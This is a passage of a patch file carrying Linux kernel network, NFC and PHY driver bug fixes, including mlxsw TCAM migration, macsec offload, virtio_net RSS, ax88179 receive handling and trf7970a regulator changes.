+@@ -1330,6 +1355,9 @@ mlxsw_sp_acl_tcam_vchunk_migrate_one(struct mlxsw_sp *mlxsw_sp,
+ 		return 0;
+ 	}
+ 
++	if (list_empty(&vchunk->ventry_list))
++		goto out;
++
+ 	/* If the migration got interrupted, we have the ventry to start from
+ 	 * stored in context.
+ 	 */
+@@ -1339,6 +1367,8 @@ mlxsw_sp_acl_tcam_vchunk_migrate_one(struct mlxsw_sp *mlxsw_sp,
+ 		ventry = list_first_entry(&vchunk->ventry_list,
+ 					  typeof(*ventry), list);
+ 
++	WARN_ON(ventry->vchunk != vchunk);
++
+ 	list_for_each_entry_from(ventry, &vchunk->ventry_list, list) {
+ 		/* During rollback, once we reach the ventry that failed
+ 		 * to migrate, we are done.
+@@ -1379,6 +1409,7 @@ mlxsw_sp_acl_tcam_vchunk_migrate_one(struct mlxsw_sp *mlxsw_sp,
+ 		}
+ 	}
+ 
++out:
+ 	mlxsw_sp_acl_tcam_vchunk_migrate_end(mlxsw_sp, vchunk, ctx);
+ 	return 0;
+ }
+@@ -1392,6 +1423,9 @@ mlxsw_sp_acl_tcam_vchunk_migrate_all(struct mlxsw_sp *mlxsw_sp,
+ 	struct mlxsw_sp_acl_tcam_vchunk *vchunk;
+ 	int err;
+ 
++	if (list_empty(&vregion->vchunk_list))
++		return 0;
++
+ 	/* If the migration got interrupted, we have the vchunk
+ 	 * we are working on stored in context.
+ 	 */
+@@ -1420,16 +1454,17 @@ mlxsw_sp_acl_tcam_vregion_migrate(struct mlxsw_sp *mlxsw_sp,
+ 	int err, err2;
+ 
+ 	trace_mlxsw_sp_acl_tcam_vregion_migrate(mlxsw_sp, vregion);
+-	mutex_lock(&vregion->lock);
+ 	err = mlxsw_sp_acl_tcam_vchunk_migrate_all(mlxsw_sp, vregion,
+ 						   ctx, credits);
+ 	if (err) {
++		if (ctx->this_is_rollback)
++			return err;
+ 		/* In case migration was not successful, we need to swap
+ 		 * so the original region pointer is assigned again
+ 		 * to vregion->region.
+ 		 */
+ 		swap(vregion->region, vregion->region2);
+-		ctx->current_vchunk = NULL;
++		mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(ctx);
+ 		ctx->this_is_rollback = true;
+ 		err2 = mlxsw_sp_acl_tcam_vchunk_migrate_all(mlxsw_sp, vregion,
+ 							    ctx, credits);
+@@ -1440,7 +1475,6 @@ mlxsw_sp_acl_tcam_vregion_migrate(struct mlxsw_sp *mlxsw_sp,
+ 			/* Let the rollback to be continued later on. */
+ 		}
+ 	}
+-	mutex_unlock(&vregion->lock);
+ 	trace_mlxsw_sp_acl_tcam_vregion_migrate_end(mlxsw_sp, vregion);
+ 	return err;
+ }
+@@ -1489,6 +1523,7 @@ mlxsw_sp_acl_tcam_vregion_rehash_start(struct mlxsw_sp *mlxsw_sp,
+ 
+ 	ctx->hints_priv = hints_priv;
+ 	ctx->this_is_rollback = false;
++	mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(ctx);
+ 
+ 	return 0;
+ 
+@@ -1541,7 +1576,8 @@ mlxsw_sp_acl_tcam_vregion_rehash(struct mlxsw_sp *mlxsw_sp,
+ 	err = mlxsw_sp_acl_tcam_vregion_migrate(mlxsw_sp, vregion,
+ 						ctx, credits);
+ 	if (err) {
+-		dev_err(mlxsw_sp->bus_info->dev, "Failed to migrate vregion\n");
++		dev_err_ratelimited(mlxsw_sp->bus_info->dev, "Failed to migrate vregion\n");
++		return;
+ 	}
+ 
+ 	if (*credits >= 0)
+diff --git a/drivers/net/ethernet/ti/am65-cpts.c b/drivers/net/ethernet/ti/am65-cpts.c
+index 9948ac14e68db..c1bdf045e9815 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.c
++++ b/drivers/net/ethernet/ti/am65-cpts.c
+@@ -649,6 +649,11 @@ static bool am65_cpts_match_tx_ts(struct am65_cpts *cpts,
+ 		struct am65_cpts_skb_cb_data *skb_cb =
+ 					(struct am65_cpts_skb_cb_data *)skb->cb;
+ 
++		if ((ptp_classify_raw(skb) & PTP_CLASS_V1) &&
++		    ((mtype_seqid & AM65_CPTS_EVENT_1_SEQUENCE_ID_MASK) ==
++		     (skb_cb->skb_mtype_seqid & AM65_CPTS_EVENT_1_SEQUENCE_ID_MASK)))
++			mtype_seqid = skb_cb->skb_mtype_seqid;
++
+ 		if (mtype_seqid == skb_cb->skb_mtype_seqid) {
+ 			u64 ns = event->timestamp;
+ 
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 7086acfed5b90..05b5914d83582 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -1110,11 +1110,12 @@ static int gtp_newlink(struct net *src_net, struct net_device *dev,
+ static void gtp_dellink(struct net_device *dev, struct list_head *head)
+ {
+ 	struct gtp_dev *gtp = netdev_priv(dev);
++	struct hlist_node *next;
+ 	struct pdp_ctx *pctx;
+ 	int i;
+ 
+ 	for (i = 0; i < gtp->hash_size; i++)
+-		hlist_for_each_entry_rcu(pctx, &gtp->tid_hash[i], hlist_tid)
++		hlist_for_each_entry_safe(pctx, next, &gtp->tid_hash[i], hlist_tid)
+ 			pdp_context_delete(pctx);
+ 
+ 	list_del_rcu(&gtp->list);
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 209ee9f352754..8a8fd74110e2c 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -1007,10 +1007,12 @@ static enum rx_handler_result handle_not_macsec(struct sk_buff *skb)
+ 	struct metadata_dst *md_dst;
+ 	struct macsec_rxh_data *rxd;
+ 	struct macsec_dev *macsec;
++	bool is_macsec_md_dst;
+ 
+ 	rcu_read_lock();
+ 	rxd = macsec_data_rcu(skb->dev);
+ 	md_dst = skb_metadata_dst(skb);
++	is_macsec_md_dst = md_dst && md_dst->type == METADATA_MACSEC;
+ 
+ 	list_for_each_entry_rcu(macsec, &rxd->secys, secys) {
+ 		struct sk_buff *nskb;
+@@ -1021,10 +1023,42 @@ static enum rx_handler_result handle_not_macsec(struct sk_buff *skb)
+ 		 * the SecTAG, so we have to deduce which port to deliver to.
+ 		 */
+ 		if (macsec_is_offloaded(macsec) && netif_running(ndev)) {
+-			if (md_dst && md_dst->type == METADATA_MACSEC &&
+-			    (!find_rx_sc(&macsec->secy, md_dst->u.macsec_info.sci)))
++			const struct macsec_ops *ops;
++
++			ops = macsec_get_ops(macsec, NULL);
++
++			if (ops->rx_uses_md_dst && !is_macsec_md_dst)
+ 				continue;
+ 
++			if (is_macsec_md_dst) {
++				struct macsec_rx_sc *rx_sc;
++
++				/* All drivers that implement MACsec offload
++				 * support using skb metadata destinations must
++				 * indicate that they do so.
++				 */
++				DEBUG_NET_WARN_ON_ONCE(!ops->rx_uses_md_dst);
++				rx_sc = find_rx_sc(&macsec->secy,
++						   md_dst->u.macsec_info.sci);
++				if (!rx_sc)
++					continue;
++				/* device indicated macsec offload occurred */
++				skb->dev = ndev;
++				skb->pkt_type = PACKET_HOST;
++				eth_skb_pkt_type(skb, ndev);
++				ret = RX_HANDLER_ANOTHER;
++				goto out;
++			}
++
++			/* This datapath is insecure because it is unable to
++			 * enforce isolation of broadcast/multicast traffic and
++			 * unicast traffic with promiscuous mode on the macsec
++			 * netdev. Since the core stack has no mechanism to
++			 * check that the hardware did indeed receive MACsec
++			 * traffic, it is possible that the response handling
++			 * done by the MACsec port was to a plaintext packet.
++			 * This violates the MACsec protocol standard.
++			 */
+ 			if (ether_addr_equal_64bits(hdr->h_dest,
+ 						    ndev->dev_addr)) {
+ 				/* exact match, divert skb to this port */
+@@ -1040,11 +1074,7 @@ static enum rx_handler_result handle_not_macsec(struct sk_buff *skb)
+ 					break;
+ 
+ 				nskb->dev = ndev;
+-				if (ether_addr_equal_64bits(hdr->h_dest,
+-							    ndev->broadcast))
+-					nskb->pkt_type = PACKET_BROADCAST;
+-				else
+-					nskb->pkt_type = PACKET_MULTICAST;
++				eth_skb_pkt_type(nskb, ndev);
+ 
+ 				__netif_rx(nskb);
+ 			}
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 3078511f76083..21b6c4d94a632 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1456,21 +1456,16 @@ static int ax88179_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 			/* Skip IP alignment pseudo header */
+ 			skb_pull(skb, 2);
+ 
+-			skb->truesize = SKB_TRUESIZE(pkt_len_plus_padd);
+ 			ax88179_rx_checksum(skb, pkt_hdr);
+ 			return 1;
+ 		}
+ 
+-		ax_skb = skb_clone(skb, GFP_ATOMIC);
++		ax_skb = netdev_alloc_skb_ip_align(dev->net, pkt_len);
+ 		if (!ax_skb)
+ 			return 0;
+-		skb_trim(ax_skb, pkt_len);
++		skb_put(ax_skb, pkt_len);
++		memcpy(ax_skb->data, skb->data + 2, pkt_len);
+ 
+-		/* Skip IP alignment pseudo header */
+-		skb_pull(ax_skb, 2);
+-
+-		skb->truesize = pkt_len_plus_padd +
+-				SKB_DATA_ALIGN(sizeof(struct sk_buff));
+ 		ax88179_rx_checksum(ax_skb, pkt_hdr);
+ 		usbnet_skb_return(dev, ax_skb);
+ 
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 45f1a871b7da8..32cddb633793d 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -2948,19 +2948,35 @@ static int virtnet_get_rxfh(struct net_device *dev, u32 *indir, u8 *key, u8 *hfu
+ static int virtnet_set_rxfh(struct net_device *dev, const u32 *indir, const u8 *key, const u8 hfunc)
+ {
+ 	struct virtnet_info *vi = netdev_priv(dev);
++	bool update = false;
+ 	int i;
+ 
+ 	if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)
+ 		return -EOPNOTSUPP;
+ 
+ 	if (indir) {
++		if (!vi->has_rss)
++			return -EOPNOTSUPP;
++
+ 		for (i = 0; i < vi->rss_indir_table_size; ++i)
+ 			vi->ctrl->rss.indirection_table[i] = indir[i];
++		update = true;
+ 	}
+-	if (key)
++
++	if (key) {
++		/* If either _F_HASH_REPORT or _F_RSS are negotiated, the
++		 * device provides hash calculation capabilities, that is,
++		 * hash_key is configured.
++		 */
++		if (!vi->has_rss && !vi->has_rss_hash_report)
++			return -EOPNOTSUPP;
++
+ 		memcpy(vi->ctrl->rss.key, key, vi->rss_key_size);
++		update = true;
++	}
+ 
+-	virtnet_commit_rss_command(vi);
++	if (update)
++		virtnet_commit_rss_command(vi);
+ 
+ 	return 0;
+ }
+@@ -3852,13 +3868,15 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 	if (virtio_has_feature(vdev, VIRTIO_NET_F_HASH_REPORT))
+ 		vi->has_rss_hash_report = true;
+ 
+-	if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS))
++	if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS)) {
+ 		vi->has_rss = true;
+ 
+-	if (vi->has_rss || vi->has_rss_hash_report) {
+ 		vi->rss_indir_table_size =
+ 			virtio_cread16(vdev, offsetof(struct virtio_net_config,
+ 				rss_max_indirection_table_length));
++	}
++
++	if (vi->has_rss || vi->has_rss_hash_report) {
+ 		vi->rss_key_size =
+ 			virtio_cread8(vdev, offsetof(struct virtio_net_config, rss_max_key_size));
+ 
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index 619dd71c9d75e..fbd36dff9ec27 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1662,6 +1662,10 @@ static bool vxlan_set_mac(struct vxlan_dev *vxlan,
+ 	if (ether_addr_equal(eth_hdr(skb)->h_source, vxlan->dev->dev_addr))
+ 		return false;
+ 
++	/* Ignore packets from invalid src-address */
++	if (!is_valid_ether_addr(eth_hdr(skb)->h_source))
++		return false;
++
+ 	/* Get address from the outer IP header */
+ 	if (vxlan_get_sk_family(vs) == AF_INET) {
+ 		saddr.sin.sin_addr.s_addr = ip_hdr(skb)->saddr;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ftm-initiator.c b/drivers/net/wireless/intel/iwlwifi/mvm/ftm-initiator.c
+index 8c5b97fb19414..5b0b4bb2bb684 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ftm-initiator.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ftm-initiator.c
+@@ -48,6 +48,8 @@ int iwl_mvm_ftm_add_pasn_sta(struct iwl_mvm *mvm, struct ieee80211_vif *vif,
+ 	if (!pasn)
+ 		return -ENOBUFS;
+ 
++	iwl_mvm_ftm_remove_pasn_sta(mvm, addr);
++
+ 	pasn->cipher = iwl_mvm_cipher_to_location_cipher(cipher);
+ 
+ 	switch (pasn->cipher) {
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index acd8803dbcdd6..b20d64dbba1ad 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -2650,7 +2650,8 @@ static int iwl_mvm_build_scan_cmd(struct iwl_mvm *mvm,
+ 		if (ver_handler->version != scan_ver)
+ 			continue;
+ 
+-		return ver_handler->handler(mvm, vif, params, type, uid);
++		err = ver_handler->handler(mvm, vif, params, type, uid);
++		return err ? : uid;
+ 	}
+ 
+ 	err = iwl_mvm_scan_umac(mvm, vif, params, type, uid);
+diff --git a/drivers/nfc/trf7970a.c b/drivers/nfc/trf7970a.c
+index 21d68664fe082..7968baa626d16 100644
+--- a/drivers/nfc/trf7970a.c
++++ b/drivers/nfc/trf7970a.c
+@@ -424,7 +424,8 @@ struct trf7970a {
+ 	enum trf7970a_state		state;
+ 	struct device			*dev;
+ 	struct spi_device		*spi;
+-	struct regulator		*regulator;
++	struct regulator		*vin_regulator;
++	struct regulator		*vddio_regulator;
+ 	struct nfc_digital_dev		*ddev;
+ 	u32				quirks;
+ 	bool				is_initiator;
+@@ -1883,7 +1884,7 @@ static int trf7970a_power_up(struct trf7970a *trf)
+ 	if (trf->state != TRF7970A_ST_PWR_OFF)
+ 		return 0;
+ 
+-	ret = regulator_enable(trf->regulator);
++	ret = regulator_enable(trf->vin_regulator);
+ 	if (ret) {
+ 		dev_err(trf->dev, "%s - Can't enable VIN: %d\n", __func__, ret);
+ 		return ret;
+@@ -1926,7 +1927,7 @@ static int trf7970a_power_down(struct trf7970a *trf)
+ 	if (trf->en2_gpiod && !(trf->quirks & TRF7970A_QUIRK_EN2_MUST_STAY_LOW))
+ 		gpiod_set_value_cansleep(trf->en2_gpiod, 0);
+ 
+-	ret = regulator_disable(trf->regulator);
++	ret = regulator_disable(trf->vin_regulator);
+ 	if (ret)
+ 		dev_err(trf->dev, "%s - Can't disable VIN: %d\n", __func__,
+ 			ret);
+@@ -2065,37 +2066,37 @@ static int trf7970a_probe(struct spi_device *spi)
+ 	mutex_init(&trf->lock);
+ 	INIT_DELAYED_WORK(&trf->timeout_work, trf7970a_timeout_work_handler);
+ 
+-	trf->regulator = devm_regulator_get(&spi->dev, "vin");
+-	if (IS_ERR(trf->regulator)) {
+-		ret = PTR_ERR(trf->regulator);
++	trf->vin_regulator = devm_regulator_get(&spi->dev, "vin");
++	if (IS_ERR(trf->vin_regulator)) {
++		ret = PTR_ERR(trf->vin_regulator);
+ 		dev_err(trf->dev, "Can't get VIN regulator: %d\n", ret);
+ 		goto err_destroy_lock;
+ 	}
+ 
+-	ret = regulator_enable(trf->regulator);
++	ret = regulator_enable(trf->vin_regulator);
+ 	if (ret) {
+ 		dev_err(trf->dev, "Can't enable VIN: %d\n", ret);
+ 		goto err_destroy_lock;
+ 	}
+ 
+-	uvolts = regulator_get_voltage(trf->regulator);
++	uvolts = regulator_get_voltage(trf->vin_regulator);
+ 	if (uvolts > 4000000)
+ 		trf->chip_status_ctrl = TRF7970A_CHIP_STATUS_VRS5_3;
+ 
+-	trf->regulator = devm_regulator_get(&spi->dev, "vdd-io");
+-	if (IS_ERR(trf->regulator)) {
+-		ret = PTR_ERR(trf->regulator);
++	trf->vddio_regulator = devm_regulator_get(&spi->dev, "vdd-io");
++	if (IS_ERR(trf->vddio_regulator)) {
++		ret = PTR_ERR(trf->vddio_regulator);
+ 		dev_err(trf->dev, "Can't get VDD_IO regulator: %d\n", ret);
+-		goto err_destroy_lock;
++		goto err_disable_vin_regulator;
+ 	}
+ 
+-	ret = regulator_enable(trf->regulator);
++	ret = regulator_enable(trf->vddio_regulator);
+ 	if (ret) {
+ 		dev_err(trf->dev, "Can't enable VDD_IO: %d\n", ret);
+-		goto err_destroy_lock;
++		goto err_disable_vin_regulator;
+ 	}
+ 
+-	if (regulator_get_voltage(trf->regulator) == 1800000) {
++	if (regulator_get_voltage(trf->vddio_regulator) == 1800000) {
+ 		trf->io_ctrl = TRF7970A_REG_IO_CTRL_IO_LOW;
+ 		dev_dbg(trf->dev, "trf7970a config vdd_io to 1.8V\n");
+ 	}
+@@ -2108,7 +2109,7 @@ static int trf7970a_probe(struct spi_device *spi)
+ 	if (!trf->ddev) {
+ 		dev_err(trf->dev, "Can't allocate NFC digital device\n");
+ 		ret = -ENOMEM;
+-		goto err_disable_regulator;
++		goto err_disable_vddio_regulator;
+ 	}
+ 
+ 	nfc_digital_set_parent_dev(trf->ddev, trf->dev);
+@@ -2137,8 +2138,10 @@ static int trf7970a_probe(struct spi_device *spi)
+ 	trf7970a_shutdown(trf);
+ err_free_ddev:
+ 	nfc_digital_free_device(trf->ddev);
+-err_disable_regulator:
+-	regulator_disable(trf->regulator);
++err_disable_vddio_regulator:
++	regulator_disable(trf->vddio_regulator);
++err_disable_vin_regulator:
++	regulator_disable(trf->vin_regulator);
+ err_destroy_lock:
+ 	mutex_destroy(&trf->lock);
+ 	return ret;
+@@ -2157,7 +2160,8 @@ static void trf7970a_remove(struct spi_device *spi)
+ 	nfc_digital_unregister_device(trf->ddev);
+ 	nfc_digital_free_device(trf->ddev);
+ 
+-	regulator_disable(trf->regulator);
++	regulator_disable(trf->vddio_regulator);
++	regulator_disable(trf->vin_regulator);
+ 
+ 	mutex_destroy(&trf->lock);
+ }
+diff --git a/drivers/phy/freescale/phy-fsl-imx8m-pcie.c b/drivers/phy/freescale/phy-fsl-imx8m-pcie.c
+index c93286483b425..211ce84d980f9 100644
+--- a/drivers/phy/freescale/phy-fsl-imx8m-pcie.c
++++ b/drivers/phy/freescale/phy-fsl-imx8m-pcie.c
+@@ -11,6 +11,7 @@
+ #include <linux/mfd/syscon.h>
+ #include <linux/mfd/syscon/imx7-iomuxc-gpr.h>
+ #include <linux/module.h>
++#include <linux/of_device.h>
+ #include <linux/phy/phy.h>
+ #include <linux/platform_device.h>
+ #include <linux/regmap.h>
+@@ -47,6 +48,15 @@
+ #define IMX8MM_GPR_PCIE_SSC_EN		BIT(16)
+ #define IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE	BIT(9)
+ 
++enum imx8_pcie_phy_type {
++	IMX8MM,
++};
++
++struct imx8_pcie_phy_drvdata {
++	const	char			*gpr;
++	enum	imx8_pcie_phy_type	variant;
++};
++
+ struct imx8_pcie_phy {
+ 	void __iomem		*base;
+ 	struct clk		*clk;
+@@ -57,6 +67,7 @@ struct imx8_pcie_phy {
+ 	u32			tx_deemph_gen1;
+ 	u32			tx_deemph_gen2;
+ 	bool			clkreq_unused;
++	const struct imx8_pcie_phy_drvdata	*drvdata;
+ };
+ 
+ static int imx8_pcie_phy_power_on(struct phy *phy)
+@@ -68,31 +79,17 @@ static int imx8_pcie_phy_power_on(struct phy *phy)
+ 	reset_control_assert(imx8_phy->reset);
+ 
+ 	pad_mode = imx8_phy->refclk_pad_mode;
+-	/* Set AUX_EN_OVERRIDE 1'b0, when the CLKREQ# isn't hooked */
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE,
+-			   imx8_phy->clkreq_unused ?
+-			   0 : IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE);
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_AUX_EN,
+-			   IMX8MM_GPR_PCIE_AUX_EN);
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_POWER_OFF, 0);
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_SSC_EN, 0);
+-
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_REF_CLK_SEL,
+-			   pad_mode == IMX8_PCIE_REFCLK_PAD_INPUT ?
+-			   IMX8MM_GPR_PCIE_REF_CLK_EXT :
+-			   IMX8MM_GPR_PCIE_REF_CLK_PLL);
+-	usleep_range(100, 200);
+-
+-	/* Do the PHY common block reset */
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_CMN_RST,
+-			   IMX8MM_GPR_PCIE_CMN_RST);
+-	usleep_range(200, 500);
++	switch (imx8_phy->drvdata->variant) {
++	case IMX8MM:
++		/* Tune PHY de-emphasis setting to pass PCIe compliance. */
++		if (imx8_phy->tx_deemph_gen1)
++			writel(imx8_phy->tx_deemph_gen1,
++			       imx8_phy->base + PCIE_PHY_TRSV_REG5);
++		if (imx8_phy->tx_deemph_gen2)
++			writel(imx8_phy->tx_deemph_gen2,
++			       imx8_phy->base + PCIE_PHY_TRSV_REG6);
++		break;
++	}
+ 
+ 	if (pad_mode == IMX8_PCIE_REFCLK_PAD_INPUT ||
+ 	    pad_mode == IMX8_PCIE_REFCLK_PAD_UNUSED) {
+@@ -111,8 +108,10 @@ static int imx8_pcie_phy_power_on(struct phy *phy)
+ 		/* Source clock from SoC internal PLL */
+ 		writel(ANA_PLL_CLK_OUT_TO_EXT_IO_SEL,
+ 		       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG062);
+-		writel(AUX_PLL_REFCLK_SEL_SYS_PLL,
+-		       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG063);
++		if (imx8_phy->drvdata->variant != IMX8MM) {
++			writel(AUX_PLL_REFCLK_SEL_SYS_PLL,
++			       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG063);
++		}
+ 		val = ANA_AUX_RX_TX_SEL_TX | ANA_AUX_TX_TERM;
+ 		writel(val | ANA_AUX_RX_TERM_GND_EN,
+ 		       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG064);
+@@ -120,15 +119,37 @@ static int imx8_pcie_phy_power_on(struct phy *phy)
+ 		       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG065);
+ 	}
+ 
+-	/* Tune PHY de-emphasis setting to pass PCIe compliance. */
+-	if (imx8_phy->tx_deemph_gen1)
+-		writel(imx8_phy->tx_deemph_gen1,
+-		       imx8_phy->base + PCIE_PHY_TRSV_REG5);
+-	if (imx8_phy->tx_deemph_gen2)
+-		writel(imx8_phy->tx_deemph_gen2,
+-		       imx8_phy->base + PCIE_PHY_TRSV_REG6);
++	/* Set AUX_EN_OVERRIDE 1'b0, when the CLKREQ# isn't hooked */
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE,
++			   imx8_phy->clkreq_unused ?
++			   0 : IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE);
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_AUX_EN,
++			   IMX8MM_GPR_PCIE_AUX_EN);
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_POWER_OFF, 0);
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_SSC_EN, 0);
+ 
+-	reset_control_deassert(imx8_phy->reset);
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_REF_CLK_SEL,
++			   pad_mode == IMX8_PCIE_REFCLK_PAD_INPUT ?
++			   IMX8MM_GPR_PCIE_REF_CLK_EXT :
++			   IMX8MM_GPR_PCIE_REF_CLK_PLL);
++	usleep_range(100, 200);
++
++	/* Do the PHY common block reset */
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_CMN_RST,
++			   IMX8MM_GPR_PCIE_CMN_RST);
++
++	switch (imx8_phy->drvdata->variant) {
++	case IMX8MM:
++		reset_control_deassert(imx8_phy->reset);
++		usleep_range(200, 500);
++		break;
++	}
+ 
+ 	/* Polling to check the phy is ready or not. */
+ 	ret = readl_poll_timeout(imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG75,
+@@ -160,6 +181,17 @@ static const struct phy_ops imx8_pcie_phy_ops = {
+ 	.owner		= THIS_MODULE,
+ };
+ 
++static const struct imx8_pcie_phy_drvdata imx8mm_drvdata = {
++	.gpr = "fsl,imx8mm-iomuxc-gpr",
++	.variant = IMX8MM,
++};
++
++static const struct of_device_id imx8_pcie_phy_of_match[] = {
++	{.compatible = "fsl,imx8mm-pcie-phy", .data = &imx8mm_drvdata, },
++	{ },
++};
++MODULE_DEVICE_TABLE(of, imx8_pcie_phy_of_match);
++
+ static int imx8_pcie_phy_probe(struct platform_device *pdev)
+ {
+ 	struct phy_provider *phy_provider;
+@@ -172,6 +204,8 @@ static int imx8_pcie_phy_probe(struct platform_device *pdev)
+ 	if (!imx8_phy)
+ 		return -ENOMEM;
+ 
++	imx8_phy->drvdata = of_device_get_match_data(dev);
++
+ 	/* get PHY refclk pad mode */
+ 	of_property_read_u32(np, "fsl,refclk-pad-mode",
+ 			     &imx8_phy->refclk_pad_mode);
+@@ -197,7 +231,7 @@ static int imx8_pcie_phy_probe(struct platform_device *pdev)
+ 
+ 	/* Grab GPR config register range */
+ 	imx8_phy->iomuxc_gpr =
+-		 syscon_regmap_lookup_by_compatible("fsl,imx6q-iomuxc-gpr");
++		 syscon_regmap_lookup_by_compatible(imx8_phy->drvdata->gpr);
+ 	if (IS_ERR(imx8_phy->iomuxc_gpr)) {
+ 		dev_err(dev, "unable to find iomuxc registers\n");
+ 		return PTR_ERR(imx8_phy->iomuxc_gpr);
+@@ -225,12 +259,6 @@ static int imx8_pcie_phy_probe(struct platform_device *pdev)
+ 	return PTR_ERR_OR_ZERO(phy_provider);
+ }
+ 
+-static const struct of_device_id imx8_pcie_phy_of_match[] = {
+-	{.compatible = "fsl,imx8mm-pcie-phy",},
+-	{ },
+-};
+-MODULE_DEVICE_TABLE(of, imx8_pcie_phy_of_match);
+-
+ static struct platform_driver imx8_pcie_phy_driver = {
+ 	.probe	= imx8_pcie_phy_probe,
+ 	.driver = {
+diff --git a/drivers/phy/marvell/phy-mvebu-a3700-comphy.c b/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
+index d641b345afa35..251e1aedd4a6e 100644
+--- a/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
++++ b/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
+@@ -602,7 +602,7 @@ static void comphy_gbe_phy_init(struct mvebu_a3700_comphy_lane *lane,
+ 	u16 val;
+ 
+ 	fix_idx = 0;
+-	for (addr = 0; addr < 512; addr++) {
++	for (addr = 0; addr < ARRAY_SIZE(gbe_phy_init); addr++) {
+ 		/*
+ 		 * All PHY register values are defined in full for 3.125Gbps
+ 		 * SERDES speed. The values required for 1.25 Gbps are almost
+@@ -610,11 +610,12 @@ static void comphy_gbe_phy_init(struct mvebu_a3700_comphy_lane *lane,
+ 		 * comparison to 3.125 Gbps values. These register values are
+ 		 * stored in "gbe_phy_init_fix" array.
+ 		 */
+-		if (!is_1gbps && gbe_phy_init_fix[fix_idx].addr == addr) {
++		if (!is_1gbps &&
++		    fix_idx < ARRAY_SIZE(gbe_phy_init_fix) &&
++		    gbe_phy_init_fix[fix_idx].addr == addr) {
+ 			/* Use new value */
+ 			val = gbe_phy_init_fix[fix_idx].value;
+-			if (fix_idx < ARRAY_SIZE(gbe_phy_init_fix))
+-				fix_idx++;
++			fix_idx++;
+ 		} else {
+ 			val = gbe_phy_init[addr];
+ 		}
+diff --git a/drivers/phy/rockchip/phy-rockchip-snps-pcie3.c b/drivers/phy/rockchip/phy-rockchip-snps-pcie3.c
+index 1d355b32ba559..c6aa6bc69e900 100644
+--- a/drivers/phy/rockchip/phy-rockchip-snps-pcie3.c
++++ b/drivers/phy/rockchip/phy-rockchip-snps-pcie3.c
+@@ -39,6 +39,8 @@
+ #define RK3588_BIFURCATION_LANE_0_1		BIT(0)
+ #define RK3588_BIFURCATION_LANE_2_3		BIT(1)
+ #define RK3588_LANE_AGGREGATION		BIT(2)
++#define RK3588_PCIE1LN_SEL_EN			(GENMASK(1, 0) << 16)
++#define RK3588_PCIE30_PHY_MODE_EN		(GENMASK(2, 0) << 16)
+ 
+ struct rockchip_p3phy_ops;
+ 
+@@ -131,7 +133,7 @@ static const struct rockchip_p3phy_ops rk3568_ops = {
+ static int rockchip_p3phy_rk3588_init(struct rockchip_p3phy_priv *priv)
+ {
+ 	u32 reg = 0;
+-	u8 mode = 0;
++	u8 mode = RK3588_LANE_AGGREGATION; /* default */
+ 	int ret;
+ 
+ 	/* Deassert PCIe PMA output clamp mode */
